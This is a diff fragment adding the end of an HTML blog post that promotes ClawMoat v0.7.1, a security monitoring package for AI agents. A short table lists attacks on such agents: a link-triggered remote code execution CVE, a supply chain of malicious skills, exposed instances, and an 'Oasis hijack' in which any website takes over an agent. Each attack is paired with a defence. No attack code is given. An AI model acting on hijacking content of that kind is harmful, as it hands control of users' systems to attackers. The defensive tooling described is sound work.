+<tr><td>CVE-2026-25253</td><td>Crafted link</td><td>Full RCE</td><td>CVE verifier</td></tr>
+<tr><td>ClawHavoc</td><td>Supply chain</td><td>824+ malicious skills</td><td>Skill integrity checker</td></tr>
+<tr><td>40K exposed</td><td>Misconfiguration</td><td>Full remote access</td><td>Gateway audit</td></tr>
+<tr><td><strong>Oasis hijack</strong></td><td><strong>Any website</strong></td><td><strong>Full agent takeover</strong></td><td><strong>Gateway monitor (v0.7.1)</strong></td></tr>
+</table>
+<p>The vulnerability disclosure rate is outpacing fixes. Runtime monitoring is no longer optional — it's the difference between knowing you've been compromised and finding out months later.</p>
+<h2>205 Tests. Zero Dependencies. One npm Install.</h2>
+<pre><code>npm install clawmoat</code></pre>
+<p>ClawMoat v0.7.1 includes the new GatewayMonitor alongside all existing protections: permission tiers, forbidden zone enforcement, credential monitoring, skill integrity checking, network egress logging, insider threat detection, and inter-agent message scanning.</p>
+<a href="https://github.com/darfaz/clawmoat" class="cta">View on GitHub</a>
+<a href="/blog/40000-exposed-openclaw-instances.html" class="cta-outline">40K Exposed Instances →</a>
+</article>
+</div>
+</body>
+</html>